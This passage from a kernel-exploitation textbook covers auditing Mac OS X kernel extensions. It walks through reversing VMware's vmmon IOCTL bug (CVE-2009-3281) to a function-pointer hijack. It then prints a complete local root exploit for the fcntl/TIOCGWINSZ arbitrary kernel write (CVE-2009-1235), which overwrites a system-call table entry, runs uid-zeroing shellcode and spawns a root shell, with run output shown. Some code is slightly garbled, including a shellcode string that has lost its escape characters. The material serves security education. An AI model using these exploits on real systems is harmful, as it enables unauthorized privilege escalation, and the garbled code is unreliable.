Since other C++ components are implemented, this means from a vulnerability hunter's perspective that C++-specific vulnerabilities are now possible in kernel space. Therefore, when auditing an IOKit kernel extension, you must keep an eye out for mismatched new and delete calls, such as creating a single object and then using delete[] on it, for example. Also, since GCC is used to compile these kernel extensions, new[] will actually wrap when allocating large numbers of objects.

The IOKit API is also a good source of information, since it exports a lot of information to user space accessible via several tools. For instance, we can use the ioalloccount and ioclasscount utilities to query the number of allocations and objects allocated by the IOKit API. Also, we can use the iostat command to query I/O statistics for the system.

Another feature IOKit provides is a device registry. This is a database that contains all the live/registered devices present on the system, along with their configuration information. We can use the ioreg command-line utility to query information from the Registry, or we can use the IORegistryExplorer GUI application to obtain a graphical view. The IOKit Registry can be a treasure trove of information during the exploitation process.

Kernel Extension Auditing

Because a lot of the kernel extensions available for Mac OS X are closed source, it makes sense to look at binary auditing kernel extensions to locate software vulnerabilities. The first step in that process is to look for manuals/documentation on the particular application. Any information you can gather in this way will make your task much easier. Typically, the next step is to enumerate the user-space-to-kernel transition points that the kernel extension exposes. These may be IOCTLs, system calls, a Mach port, a PF_SYSTEM socket, or a variety of other types of interfaces. One way to discover these interfaces is to reverse engineer the entire start() function for the kext from start to finish. Although this is time-consuming, it allows you to conclusively determine all the interface types as they are initialized.

For our purposes here, however, we will look at an existing vulnerability present in the vmmon kernel extension that ships with VMware Fusion. VMware has assigned this vulnerability a CVE ID of CVE-2009-3281 and an ID of VMSA-2009-0013, and has described it as an issue associated with performing an IOCTL call. An exploit already exists for this vulnerability (written by mu-b [digitlabs]), but since we are more concerned at this stage with the auditing process we will ignore his exploit for now.

To begin reverse engineering the vmmon binary we will use IDA Pro from Datarescue. IDA Pro is a commercial product, but older releases of the tool are available for free from the Hex-Rays Web site.B

To begin auditing our binary, we first fire up IDA Pro, and open the binary within the vmmon.kext/Contents/MacOS directory. As we mentioned previously, we now need to try to enumerate our user-space-to-kernel interfaces to begin auditing. Rather than reversing the whole start() function, though, we will take a shortcut. Because we know the names of the routines responsible for setting up these interfaces, we can simply open the Imports subview and search for their names, as shown in Figure 5.4.

Image

Figure 5.4 Looking for known function names in the imports section.

Looking around, we find a cdevsw_add() import. This is the function responsible for setting up a character device's file operation function pointers. To determine where this was called in the binary, we simply highlight the function and press the X key. This looks up the cross-references for the function, as shown in Figure 5.5.

Image

Figure 5.5 Checking for cross-references.

Figure 5.5 shows only one cross-reference, so we click OK to jump to it. From the kernel source code, we know the cdevsw_add() function has the following definition:

int cdevsw_add(int index, struct cdevsw * csw);

This function takes two arguments. The first is an index into an array called cdevsw[]. This array is responsible for storing all the file operation function pointers for each character device under devfs on the system. The index argument dictates where in the array the new device's operations will be stored. In our case, as shown in Figure 5.6, the value −1 is supplied as the index (0xFFFFFFFF). When cdevsw_add() sees a negative value, it uses the absolute value of the index instead, and then begins scanning for a usable slot from this location. However, the value of −1 will cause cdevsw_add() to start scanning from slot 0. The second argument to this function is of the type struct cdevsw. The definition for this structure looks like this:

struct cdevsw {

open_close_fcn_t *d_open;

open_close_fcn_t *d_close;

read_write_fcn_t *d_read;

read_write_fcn_t *d_write;

ioctl_fcn_t *d_ioctl;

stop_fcn_t *d_stop;

reset_fcn_t *d_reset;

struct tty **d_ttys;

select_fcn_t *d_select;

mmap_fcn_t *d_mmap;

strategy_fcn_t *d_strategy;

getc_fcn_t *d_getc;

putc_fcn_t *d_putc;

int d_type;

};

Each function pointer in this structure is used to define the different functions called when a read/write or similar operation is performed on a character device file on devfs. As you can see, the fifth element of this structure defines the function pointer for the IOCTL for this device. Okay, time to get back to IDA Pro for some more debugging.

Image

Figure 5.6 Tracking down the cdevsw_add() call.

In the highlighted area in Figure 5.6, you can see that 0xFFFFFFFF is passed as index; you can also see an interesting reference to the somewhat obscure name unk_EE60. From the declaration of the function and the assembly, we can determine that it is our cdevsw struct, but IDA Pro does not know that; that's why it named it after its offset/address. The good news is that we can tell IDA Pro that, and immediately the software will name for us all the members used at the various locations. Rather than adding all the different types for the function pointers used, we can change the type to the native void (*ptr)() type. To add our structure to IDA Pro, we press the Shift + F1 hotkey combination to open the Local Types subview. From this view we press the Insert key to add a new structure, and paste in our C code. Once this is done, we press the Enter key to add our structure, as shown in Figure 5.7.

Image

Figure 5.7 Adding a structure definition as a new type.

Now that IDA Pro knows about our structure, it is time to tell it that it has to apply the definition to the unk_EE60 location. To do this, we browse to unk_EE60 in the IDA View and press the Alt + Q hotkey combination. IDA Pro will open a window from where we can pick the type definition we want to associate to the specific memory location, as shown in Figure 5.8.

Image

Figure 5.8 Associating a type to a memory location.

We select cdevsw from the pop-up box and the unk_EE60 location is formatted according to our defined structure. That's pretty nice, since now we can expand the structure (by pressing the + key) and check the address of the d_ioctl member, which is where the vulnerability lies. This is shown in Figure 5.9.

Image

Figure 5.9 Expanding the structure definition to find the d_ioctl address.

From here we can clearly see the address of our IOCTL function: 0xC98. We can press the Enter key with this value selected to jump to it in our IDA View-A subview. With a few quick steps, we have just vastly reduced the amount of binary code we need to disassemble to hunt for the vulnerability. Not bad.

Tip

IOCTLs are a common source of vulnerabilities. The steps we presented here are a common and useful starting point when reverse engineering kexts to look for bugs.

Now that we know where our IOCTL is located in the binary, we can begin with the fun part: auditing it, looking for bugs. Before that, though, we must look at the kernel source code to see how the function is defined:

ioctl(int fildes, unsigned long request, …);

IOCTL functions typically take three arguments. The first is the file descriptor on which the IOCTL is being executed. This is usually an open devfs file. The second argument is an unsigned long that is used to indicate which functionality the IOCTL is to perform. Typical behavior for an IOCTL is to perform a switch case on this code to decide which action to perform. The final argument to an IOCTL is usually a void type pointer that can be used to represent any data that needs to be passed from user space to the particular IOCTL functionality.

A good thing to do at this point is to use the N key in IDA Pro to name the function arguments appropriately. This will make the reverse-engineering process much clearer. Once we do this, we must begin the process of auditing the IOCTL for bugs. As we mentioned earlier in this section, IOCTLs generally start with a switch statement that checks the request argument against predefined values to determine which functionality is required. As such, the code begins by testing the file descriptor to make sure it's valid. It then goes straight into comparing the request argument against a series of predefined values, and then jumping to the code that is responsible. Locating the check-and-jump sequence (an excerpt of which is shown in Figure 5.10) is pretty straightforward, and after painstakingly auditing each of these by hand (or cheating and looking at mu-b's exploitC ) we find a value for request that seems to have a vulnerability.

Image

Figure 5.10 Disassembly of the IOCTL call: check-and-jump sequences.

Figure 5.11 shows a disassembly of the code associated with the 0x802E564A case (loc_1546, the target of the jump, is highlighted on top).

Image

Figure 5.11 Disassembly of the vulnerable IOCTL path.

The first thing that stands out is that the byte_EF60 global variable is tested against 0; if it is 0 it jumps down to loc_1584 (_text:0000155A). The code then takes the data argument (_text:00001584) and starts copying in four-byte increments (the offsets are 0x4, 0x8, 0xC, 0x10, etc.) into various unknown global variables (dword_D040, dword_D044, etc.). To understand this further, we need to see exactly what happens with those variables after our code is finished. To do this, we can once again use IDA Pro's cross-referencing capability to see what happens to each location.

By going down the list of locations and looking at each cross-reference in turn, we can see how they are used. The first location of interest is dword_D0D60, as you can see in Figure 5.12.

Image

Figure 5.12 Interesting cross-reference use of a controlled variable.

The cross-reference window shows something really interesting. The second (highlighted) reference shows a call using the global variable as an address, which means dword_D060 is a function pointer of some kind that is being set directly from the IOCTL. It is worthwhile to check what happens with this variable. As usual, we press Enter on the instruction to open it in our IDA View and we quickly realize, following the stream shown in Figure 5.13, that no sanity checking is being performed on the value provided before use.

Image

Figure 5.13 Disassembly of the instruction surrounding the use of our function pointer.

If we scroll up a little, we can see that this code takes place in the sub_372E function.

Next, if we press the X key to cross-reference this function, we can see that it's called from three places, all of which are within the Page_LateStart() function. If we go backward and cross-reference this again, we can see that Page_LateStart() is called directly after our function pointer is populated from within our IOCTL (_text:000015FE), as shown in Figure 5.14.

Image

Figure 5.14 Page_LateStart() call from within our IOCTL.

To recap, this basically means we can call an IOCTL from user space, set up a function pointer to point to an arbitrary location of our choice, and have it called: an exploit writer's dream. Before we can write up an exploit for this bug, however, we need to determine how to populate our first IOCTL argument, the file descriptor upon which the IOCTL acts. In other words, this means we need to know which file to open to access this code.

To accomplish this, we can go back to the Imports subview for this binary and search for the function responsible for setting up the device file itself within devfs. This function is called devfs_make_node(). Once we've found it, we can cross-reference it to find where it's called from. We find it inside the disassembly block in Figure 5.15.

Image

Figure 5.15 Finding the caller of devfs_make_node().

Why is it so important to find the caller of devfs_make_node()? Well, looking at the code, we see that the “vmmon” string is passed as the last argument to this function. This is the name of the device file on the devfs mount. This means the device we need to open is /dev/vmmon.

Now that we have the information we need, we can start crafting our exploit. To trigger the vulnerability, we must follow these steps:

  1. Open the /dev/vmmon file.

  2. Create a buffer that will populate the function pointer to a value of our choice.

  3. Call the ioctl() function with the appropriate code, passing in our buffer.

  4. Make sure our function pointer is called.

We are close now, but not there yet. There is still a slight restriction on our exploit. At the start of our IOCTL code path, after the request value is checked and our jump is taken, a global value is tested for 0:

__text:00001553 cmp ds:byte_EF60, 0

__text:0000155A jz short loc_1584

This jump must be taken for us to be able to populate this function pointer. To do this, we must work out what the byte_EF60 global variable is used for.

Once again, we can cross-reference this variable to see how it is used in the binary. Figure 5.16 shows the result.

Image

Figure 5.16 Cross-referencing the global variable byte_EF60.

The cross-reference that looks the most interesting in the list is highlighted. This is the only case where the value in our global variable is updated to 1, which means that if this code is executed before we try to exploit this bug we will be unable to trigger it. By selecting this entry and pressing Enter we can see (as shown in Figure 5.17) that this instruction is actually executed at the end of our IOCTL (_text:000015E8), right before our function pointer is called (_text:000015FE).

Image

Figure 5.17 Disassembly of the test for multiple attempts to set callbacks.

This means this IOCTL can be called in this way only once. Then, after the function pointers are set up, this code path can no longer be taken. We can infer from this that if VMware has been started on the machine we are trying to exploit, and these function pointers have already been populated, exploitation will not be possible.

Now that we have most of the information we need to trigger this vulnerability, we need to work out the offset, into our attack string, of the function pointer that will be called first after it is overwritten in our IOCTL. A quick way to do this is to use the Metasploit pattern_create.rb tool. This is a simple process; we can execute it as shown in the following code, specifying the length of our buffer (128 in this case):

-[luser@macosxbox]$ ./pattern_create.rb 128

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac 3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae

This tool is pretty straightforward. It creates a sequence of hexadecimal code that we can pass as a payload. After that, once we trigger an invalid pointer dereference, we will be able to look for the returned address used by the program in the pattern and calculate the correct offset. Let's see how this works. We'll start by inserting the string pattern into our exploit as the attack string, and pass it to our IOCTL function as the data parameter:

#include <stdio.h>

#include <stdlib.h>

#include <fcntl.h>

#include <sys/ioctl.h>

#include <sys/types.h>

#include <sys/param.h>

#include <unistd.h>

#define REQUEST 0x802E564A

char data[] =

"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2A c3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae";

int main(int argc, char **argv)

{

int fd;

if((fd = open ("/dev/vmmon", O_RDONLY)) == −1 ){

printf("error: couldn't open /dev/vmmon ");

exit(1);

}

ioctl(fd, REQUEST, data);

return 0;

}

If we compile and execute this code with a debugger attached, we are greeted with the following message:

Program received signal SIGTRAP, Trace/breakpoint trap.

0x41316241 in ?? ()

This shows that our exploit successfully overwrote one of the function pointers and it was executed. The value of EIP (0x41316241) is clearly in the ASCII character range provided by our buffer. To determine the offset we need, we simply provide this value as an argument to the pattern_offset.rb tool that ships with the Metasploit framework. This tool complements the pattern_create.rb tool, by generating the same buffer we used earlier and locating our EIP value within it.

-[dcbz@macosxbox:~/code/msf/tools]$ ./pattern_offset.rb 41316241

33

It looks like “33” is our guy. We can double-check this in our exploit by seeking 33 bytes into our array, and then writing out a custom value. We pick 0xdeadbeef, as it is easily recognizable as arbitrary code execution.

#define BUFFSIZE 128

#define OFFSET 33

char data[BUFFSIZE];

int main(int argc, char **argv)

{

[…]

memset(data,'A',BUFFSIZE);

ptr = &data[OFFSET];

*ptr = 0xdeadbeef;

ioctl(fd, REQUEST, data);

return 0;

}

Once again, if we compile and execute this code, it's clear that we have controlled execution. We are greeted with the familiar message that the processor is trying to fetch and execute the instruction at the memory location 0xdeadbeef.

Program received signal SIGTRAP, Trace/breakpoint trap.

0xdeadbeef in ?? ()

Now that you know how to track down a bug and start writing a proof of concept to trigger the vulnerability, it is time to move on and turn this into a working, reliable exploit.

The Execution Step

Once again, for consistency we will begin our analysis of Mac OS X kernel exploitation by exploring the execution step. Like most other UNIX-derived operating systems, Mac OS X utilizes the uid/euid/gid/egid system for storing per-process authorization credentials. To accomplish this, the BSD system calls setuid/getuid/setgid/getgid and their brethren were implemented.

During exploitation, when we gain code execution we typically want to emulate the behavior of the setuid() system call, to set our process's user ID to the root account (uid=0) granting us full access to the system. To do this, we must learn to locate our authorization credentials in memory, and then change them. The first step in this process is to find and parse the proc struct.

You can find the definition of the proc struct in the header file bsd/sys/proc_internal.h within the XNU source tree. For now, however, we are most concerned with the fact that within the proc struct is a pointer to the user credentials structure (p_ucred) that contains UID information for the process. To easily work out which offset within the proc struct is the ucred structure we can reverse the proc_ucred function:

/* returns the cred associated with the process; temporary api */

kauth_cred_t proc_ucred(proc_t p)

This function takes a proc struct as an argument and returns the ucred struct from within it. If we fire up GDB and disassemble this function, we can see that it offsets the proc struct by 0x64 (100) bytes to retrieve the ucred struct.

0x0037c6a0 <proc_ucred+0>: push %ebp

0x0037c6a1 <proc_ucred+1>: mov %esp,%ebp

0x0037c6a3 <proc_ucred+3>: mov 0x8(%ebp),%eax

0x0037c6a6 <proc_ucred+6>: mov 0x64(%eax),%eax

0x0037c6a9 <proc_ucred+9>: leave

0x0037c6aa <proc_ucred+10>: ret

Finally, within our ucred struct lie the cr_uid and cr_ruid elements. These are clearly at offsets 0xc and 0x10 (12 and 16). To elevate our process's privileges to root, we need to set both of these fields to 0.

struct ucred {

TAILQ_ENTRY(ucred) cr_link; /* never modify this without KAUTH_CRED_HASH_LOCK */

u_long cr_ref; /* reference count */

/*

* The credential hash depends on everything from this point on

* (see kauth_cred_get_hashkey)

*/

uid_t cr_uid; /* effective user id */

uid_t cr_ruid; /* real user id */

uid_t cr_svuid; /* saved user id */

short cr_ngroups; /* number of groups in advisory list */

gid_t cr_groups[NGROUPS]; /* advisory group list */

gid_t cr_rgid; /* real group id */

gid_t cr_svgid; /* saved group id */

uid_t cr_gmuid; /* UID for group membership purposes */

struct auditinfo cr_au; /* user auditing data */

struct label *cr_label; /* MAC label */

int cr_flags; /* flags on credential */

/*

* NOTE: If anything else (besides the flags)

* added after the label, you must change

* kauth_cred_find().

*/

};

From the data structures shown in the preceding code, we can formulate that given a pointer to the proc struct in EAX the following instructions will elevate our privileges to those of the root user:

mov eax,[eax+0x64] ;get p_ucred *

mov dword [eax+0xc], 0x00000000 ;write 0x0 to uid

mov dword [eax+0x10],0x00000000 ;write 0x0 to euid

Exploitation Notes

In this section, we will run through some of the common vectors of kernel exploitation and look at some examples in relation to XNU. Since XNU is a relatively young kernel (and hasn't attracted the attention of too many attackers yet), there are not a lot of published kernel vulnerabilities. This means that we had to contrive some of the examples in this section to demonstrate the techniques involved.

Arbitrary Memory Overwrite

The first type of vulnerability we will look at is a simple arbitrary kernel memory overwrite. As we described in Chapter 2 this kind of issue allows unprivileged user-level code running in Ring 3 to gain access to write anything anywhere in the kernel's address space. A vulnerability such as this was found by Razvan Musaloiu (and was fixed in Mac OS X 10.5.8) and was given the identifier CVE-2009-1235. We're analyzing this vulnerability first because it will make you think about what you can accomplish with a write anything/anywhere code construct to gain privilege elevation. Although this is a relatively simple task, it is a common situation as a result of successfully exploiting other aspects of the kernel, and therefore can be used as a building block.

Razvan described his understanding of this vulnerability on his Web site.2 This vulnerability revolves around the fact that by calling the device's ioctl() functions via the fcntl() system call, the third parameter (data) is treated as a kernel pointer rather than a pointer to/from user space.

As Razvan wrote in his description, the call stack for a call using fcntl() is very similar to the equivalent ioctl() call stack. However, a large block of code (fo_ioctl/vn_ioctl) that is responsible for sanitizing this behavior is skipped.

This means that all we need to exploit this vulnerability is an ioctl() that allows us to write arbitrary user-controlled data to this third parameter. Luckily for us, Razvan also points out one such call in his write-up: TIOCGWINSZ. This ioctl() is used to return the size of the window to the user, allowing the user to update the terminal size. This data is in the form of a winsize structure, which looks as follows:

struct winsize {

unsigned short ws_row; /* rows, in characters */

unsigned short ws_col; /* columns, in characters */

unsigned short ws_xpixel; /* horizontal size, pixels */

unsigned short ws_ypixel; /* vertical size, pixels */

};

Before we look at exploiting this vulnerability, let's look at the regular usage of the TIOCGWINSZ ioctl() function. The following code simply calls the IOCTL on the STDIN/STDOUT file handle and passes it the address of the wz winsize structure. It then displays each entry of the structure.

#include <stdio.h>

#include <stdlib.h>

#include <sys/ttycom.h>

#include <sys/ioctl.h>

int main(int ac, char **av)

{

struct winsize wz;

if(ioctl(0, TIOCGWINSZ, &wz) == −1){

printf("error: calling ioctl() ");

exit(1);

}

printf("ws_row: %d ",wz.ws_row);

printf("ws_col: %d ",wz.ws_col);

printf("ws_xpixel: %d ",wz.ws_xpixel);

printf("ws_ypixel: %d ",wz.ws_ypixel);

return 0;

}

This code works as expected:

-[luser@macosxbox]$ gcc winsize.c -o winsize

-[luser@macosxbox]$ ./winsize

ws_row: 55

ws_col: 80

ws_xpixel: 0

ws_ypixel: 0

The kernel code responsible for copying this structure to data is located in the bsd/kern/tty.c file in the XNU source tree:

963 case TIOCGWINSZ: /* get window size */

964 *(struct winsize *)data = tp->t_winsize;

965 break;

It is easy to see that by controlling data and making it a pointer at the kernel level, we can write almost arbitrary data in arbitrary locations. The most important thing now is to figure out how to control what we write.

To do this we need to populate the winsize structure in the kernel before we write it to our supplied address. We can use the TIOCSWINSZ IOCTL for this purpose. This is the exact reverse of TIOCGWINSZ; it simply takes a winsize structure as the third data argument and copies it into the winsize structure (t_winsize) in kernel memory. By first calling TIOCSWINSZ with our data and then calling TIOCGWINSZ via fcntl(), we can write any eight bytes (sizeof(struct winsize)) of our choice anywhere in kernel memory.

We can now begin to formulate our exploit code for this. First, we'll create two functions for reading and writing the winsize structure in the kernel. These are simple, and could easily be macros, but they will make our code cleaner.

int set_WINSZ(char *buff)

{

return ioctl(0, TIOCSWINSZ, buff);

}

int get_WINSZ(char *buff)

{

return ioctl(0, TIOCGWINSZ, buff);

}

These two functions are for our legitimate use of the TIOCGWINSZ IOCTL, but now we must create a function for accessing this using the fcntl() method to write to kernel memory. Since in some cases we may need to write more than eight bytes (the size of the winsize structure), we can design our function to repeatedly make the fcntl() call to write the full extent of the data. It will also utilize the set_WINSZ() function from earlier to update the data being written each time. Here is our completed function:

int do_write(u_long addr, char *data, u_long len)

{

u_long offset = 0;

if(len % 8) {

printf("[!] Error: data len not divisible by 8 ");

exit(1);

}

while(offset < len) {

set_WINSZ(&data[offset]);

fcntl(0, TIOCGWINSZ, addr);

offset += 8;

addr += 8;

}

return offset;

}

With the code we have written so far, we have gained the ability to write anything we want anywhere in kernel memory. Now, however, we need to work out what we can overwrite to gain control of execution. Ideally, we would like to overwrite either the per-process structure responsible for storing our user ID (proc struct) or a function pointer of some kind that we can call at will.

An obvious choice that meets our criteria is to overwrite an unused entry in one of the system call tables. As we described in this chapter's introduction, the XNU kernel has several system call tables set up in memory, and any of these would be a worthwhile target. Probably the most suitable system call table for our purposes is the BSD sysent array. This is because when a BSD system call is executed the first argument passed to it is always a pointer to the current proc struct. This makes it very easy for our shellcode to modify the process structure and give the calling process elevated privileges. We will, however, be required to identify the address of the table prior to using it. By default on Mac OS X, the kernel binary is available on disk as /mach_kernel. It is stored in an uncompressed format and is simply a Mach-O binary. This makes it trivial for an attacker to resolve most symbols by simply using the “nm” utility, which is installed by default on Mac OS X. Indeed, grepping through the mach_kernel symbols looks like the way to go:

-[luser@macosxbox]$ nm /mach_kernel | head −n5

0051d7b4 D .constructors_used

0051d7bc D .destructors_used

002a64f3 T _AARPwakeup

ff7f8000 A _APTD

feff7fc0 A _APTDpde

Unfortunately, there's a slight problem with this. Because many rootkits began to simply modify the system call table to hook system activity, Apple decided to no longer export the sysent symbol for use by kernel extensions. This means we cannot easily locate sysent with a simple grep. However, Landon Fuller3 demonstrated a useful technique while he was developing a replacement for the crippled ptrace() functionality. Landon proposed that by isolating the address of the nsysent variable, which is stored in memory directly before the sysent array, and then adding 32 to this value, you can locate the sysent table. Utilizing his technique, we can develop the following function to resolve the address of the sysent table (and yes, use grep again):

u_long get_syscall_table()

{

FILE *fp = popen("nm /mach_kernel | grep nsysent", "r");

u_long addr = 0;

fscanf(fp,"%x ",&addr);

addr += 32;

printf("[+] Syscall table @ 0x%x ",addr);

return addr;

}

Using this function, we can retrieve the address of the beginning of the sysent array; however, we still need to seek into this array and write our function pointer to it. To do this we need to understand the format of each entry in this array, described via the sysent struct:

struct sysent {

int16_t sy_narg; /* number of arguments */

int8_t reserved; /* unused value */

int8_t sy_flags; /* call flags */

sy_call_t *sy_call; /* implementing function */

sy_munge_t *sy_arg_munge32;

sy_munge_t *sy_arg_munge64

int32_t sy_return_type; /* return type */

uint16_t sy_arg_bytes;

} *_sysent;

This structure contains attributes describing the function responsible for handling the system call designated by the index into the table. The first element is the number of arguments the system call takes. The most important element to us is the sy_call function pointer that points to the location of the function responsible for handling the system call. Next, we must look at the sysent table definition and find an unused slot in the table. We can accomplish this by simply reading the /usr/include/sys/syscall.h header file and finding a gap in the numbers that are allocated.

#define SYS_obreak 17

#define SYS_ogetfsstat 18

#define SYS_getfsstat 18

/* 19 old lseek */

#define SYS_getpid 20

/* 21 old mount */

/* 22 old umount */

#define SYS_setuid 23

#define SYS_getuid 24

The syscall index value 21 is unused, so this will suit our needs sufficiently. With this in mind we can structure our fake sysent entry as follows:

struct sysent fsysent;

fsysent.sy_narg = 1;

fsysent.sy_resv = 0;

fsysent.sy_flags = 0;

fsysent.sy_call = (void *) 0xdeadbeef;

fsysent.sy_arg_munge32 = NULL;

fsysent.sy_arg_munge64 = NULL;

fsysent.sy_return_type = 0;

fsysent.sy_arg_bytes = 4;

This entry will result in execution control being driven to the unmapped value 0xdeadbeef. To make this happen we need to use our do_write() function to write this structure to the appropriate place in kernel memory. Our code first resolves the address of the sysent table using our get_syscall_table() function. After this, the LEOPARD_HIT_ADDY macro is used to calculate the offset into the table for the particular syscall number of our choice. This macro was taken from an HFS exploit written by mu-b and simply multiplies the size of a sysent entry by the syscall number and adds it to the address of the base of the sysent table.

#define SYSCALL_NUM 21

#define LEOPARD_HIT_ADDY(a) ((a)+(sizeof(struct sysent)*SYSCALL_NUM))

printf("[+] Retrieving address of syscall table… ");

sc_addr = get_syscall_table();

printf("[+] Overwriting syscall entry. ");

do_write(LEOPARD_HIT_ADDY(sc_addr),&fsysent,sizeof(fsysent));

Now that our code can overwrite the sysent entry for our unused system call, all that's left is to call it and see what happens. The following code will do this:

syscall (SYSCALL_NUM, NULL);

If we compile the code we've written so far and execute it with a debugger attached, we'll see the following message:

(gdb) c

Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.

0xdeadbeef in ?? ()

Jackpot! Once again, this indicates that we've controlled execution and redirected it to 0xdeadbeef. This means we can execute code at any location of our choice; however, we will need to execute some meaningful shellcode for this to be of any use to us.

Note

It's interesting to note that although Apple stopped exporting the sysent table due to rootkit use, it never stopped exporting the symbols for the other system call tables available in the kernel. This means tables such as mach_trap_table are still easy to access from a kernel extension.

Since we are able to write anything we want to kernel memory, we can easily pick a location and write our shellcode to it. The write-up of this vulnerability by Razvan that we mentioned earlier showed a location in kernel memory that can be overwritten with very few consequences. This is known as iso_font. This seems like a perfect location for our shellcode. We can use the following function to resolve the address of this location, in exactly the same way the nsysent symbol was retrieved:

u_long get_iso_font()

{

FILE *fp = popen("nm /mach_kernel | grep iso_font", "r");

u_long addr = 0;

fscanf(fp,"%x ",&addr);

printf("[+] iso_font is @ 0x%x ",addr);

return addr;

}

The final step in the exploitation process is to create some shellcode to elevate the privileges of our current process. We can use the generic shellcode approach we described earlier, in the section “The Execution Step,” but it's worth remembering once again that writing shellcode for kernel exploitation can be situational. Although it is possible to write generic kernel shellcode, often you need to take precautions to make sure your exit from the kernel is clean, by repairing corrupt memory structures, for example. To complete this exploit, we simply need to use the first argument on the stack to access the proc struct for our calling process. To do this we must perform a typical function prolog, setting up the base pointer and storing the old one on the stack. We can then access the proc struct via EBP+8.

push ebp

mov ebp,esp

mov eax,[ebp+0x8]

After we have retrieved the proc struct address we can use the instructions we documented in “The Execution Step” to elevate our privileges. When we're finished writing to our ucred struct we can simply use the LEAVE instruction to reverse the process, then use the RET instruction to return to the system call dispatch code, which in turn will return us to user space with no negative consequences. Putting this all together leaves us with the following shellcode:

push ebp

mov ebp,esp

mov eax,[ebp+0x8] ; get proc *

mov eax,[eax+0x64] ; get p_ucred *

mov dword [eax+0xc], 0x00000000 ; write 0x0 to uid

mov dword [eax+0x10],0x00000000 ; write 0x0 to euid

xor eax,eax

leave

ret ; return 0

All that's left now is to write our shellcode into the location of iso_ font that we retrieved earlier. Once again, we can use our do_write() function to accomplish this:

printf("[+] Writing shellcode to iso_font. ");

do_write(shell_addr,shellcode,sizeof(shellcode));

For the sake of completeness, we have included the full source code for a sample exploit for this vulnerability. This exploit combines everything we've discussed so far to leverage a root shell. After the ucred struct has been modified, it's simply a case of execve()'ing /bin/sh to collect our root shell.

/* -------------------

* -[ nmo-WINSZ.c ]-

* by nemo - 2009

-------------------

*

* Exploit for: http://butnotyet.tumblr.com/post/175132533/the-story-of-a-simple-and-dangerous-kernel-bug

* Stole shellcode from mu-b's hfs exploit, overwrote the same syscall entry (21).

*

* Tested on Leopard: root:xnu-1228.12.14~1/RELEASE_I386 i386

*

* Enjoy…

*

* - nemo

*/

#include <stdio.h>

#include <stdlib.h>

#include <sys/types.h>

#include <sys/time.h>

#include <sys/mman.h>

#include <unistd.h>

#include <sys/param.h>

#include <sys/sysctl.h>

#include <sys/signal.h>

#include <sys/utsname.h>

#include <sys/stat.h>

#include <sys/ioctl.h>

#include <errno.h>

#include <fcntl.h>

#include <string.h>

#include <sys/syscall.h>

#include <unistd.h>

#define SYSCALL_NUM 21

#define LEOPARD_HIT_ADDY(a) ((a)+(sizeof(struct sysent)*SYSCALL_NUM))

struct sysent {

short sy_narg;

char sy_resv;

char sy_flags;

void *sy_call;

void *sy_arg_munge32;

void *sy_arg_munge64;

int sy_return_type;

short sy_arg_bytes;

};

static unsigned char shellcode[] =

"x55"

"x89xe5"

"x8bx45x08"

"x8bx40x64"

"xc7x40x10x00x00x00x00"

"x31xc0"

"xc9"

"xc3x90x90x90";

u_long get_syscall_table()

{

FILE *fp = popen("nm /mach_kernel | grep nsysent", "r");

u_long addr = 0;

fscanf(fp,"%x ",&addr);

addr += 32;

printf("[+] Syscall table @ 0x%x ",addr);

return addr;

}

u_long get_iso_font()

{

FILE *fp = popen("nm /mach_kernel | grep iso_font", "r");

u_long addr = 0;

fscanf(fp,"%x ",&addr);

printf("[+] iso_font is @ 0x%x ",addr);

return addr;

}

void banner()

{

printf("[+] Exploit for: http://butnotyet.tumblr.com/post/175132533/the-story-of-a-simple-and-dangerous-kernel-bug ");

printf("[+] by nemo, 2009… . ");

printf("[+] Enjoy!;) ");

}

int set_WINSZ(char *buff)

{

return ioctl(0, TIOCSWINSZ, buff);

}

int get_WINSZ(char *buff)

{

return ioctl(0, TIOCGWINSZ, buff);

}

int do_write(u_long addr, char *data, u_long len)

{

u_long offset = 0;

if(len % 8) {

printf("[!] Error: data len not divisible by 8 ");

exit(1);

}

while(offset < len) {

set_WINSZ(&data[offset]);

fcntl(0, TIOCGWINSZ, addr);

offset += 8;

addr += 8;

}

return offset;

}

int main(int ac, char **av)

{

char oldwinsz[8],newwinsz[8];

struct sysent fsysent;

u_long shell_addr, sc_addr;

char *args[] = {"/bin/sh",NULL};

char *env[] = {"TERM=xterm",NULL};

banner();

printf("[+] Backing up old win sizes. ");

get_WINSZ(oldwinsz);

printf("[+] Retrieving address of syscall table… ");

sc_addr = get_syscall_table();

printf("[+] Retrieving address of iso_font… ");

shell_addr = get_iso_font();

printf("[+] Writing shellcode to iso_font. ");

do_write(shell_addr,shellcode,sizeof(shellcode));

printf("[+] Setting up fake syscall entry. ");

fsysent.sy_narg = 1;

fsysent.sy_resv = 0;

fsysent.sy_flags = 0;

fsysent.sy_call = (void *) shell_addr;

fsysent.sy_arg_munge32 = NULL;

fsysent.sy_arg_munge64 = NULL;

fsysent.sy_return_type = 0;

fsysent.sy_arg_bytes = 4;

printf("[+] Overwriting syscall entry. ");

do_write(LEOPARD_HIT_ADDY(sc_addr),&fsysent,sizeof(fsysent));

printf ("[+] Executing syscall.. ");

syscall (SYSCALL_NUM, NULL);

printf("[+] Restoring old sizes ");

set_WINSZ(oldwinsz);

printf("[+] We are now uid=%i. ", getuid());

printf("[+] Dropping a shell. ");

execve(*args,args,env);

return 0;

}

Here is the output from executing this exploit. As you can see, it leaves us with a bash prompt with root privileges.

-[luser@macosxbox]$ ./nmo-WINSZ

[+] Exploit for: http://butnotyet.tumblr.com/post/175132533/the-story- of-a-simple-and-dangerous-kernel-bug

[+] by nemo, 2009….

[+] Enjoy!;)

[+] Backing up old win sizes.

[+] Retrieving address of syscall table…

[+] Syscall table @ 0x50fa00

[+] Retrieving address of iso_font…

[+] iso_font is @ 0x4face0

[+] Writing shellcode to iso_font.

[+] Setting up fake syscall entry.

[+] Overwriting syscall entry.

[+] Executing syscall..

$ id

uid=0(root) gid=0(wheel) groups=0(wheel)

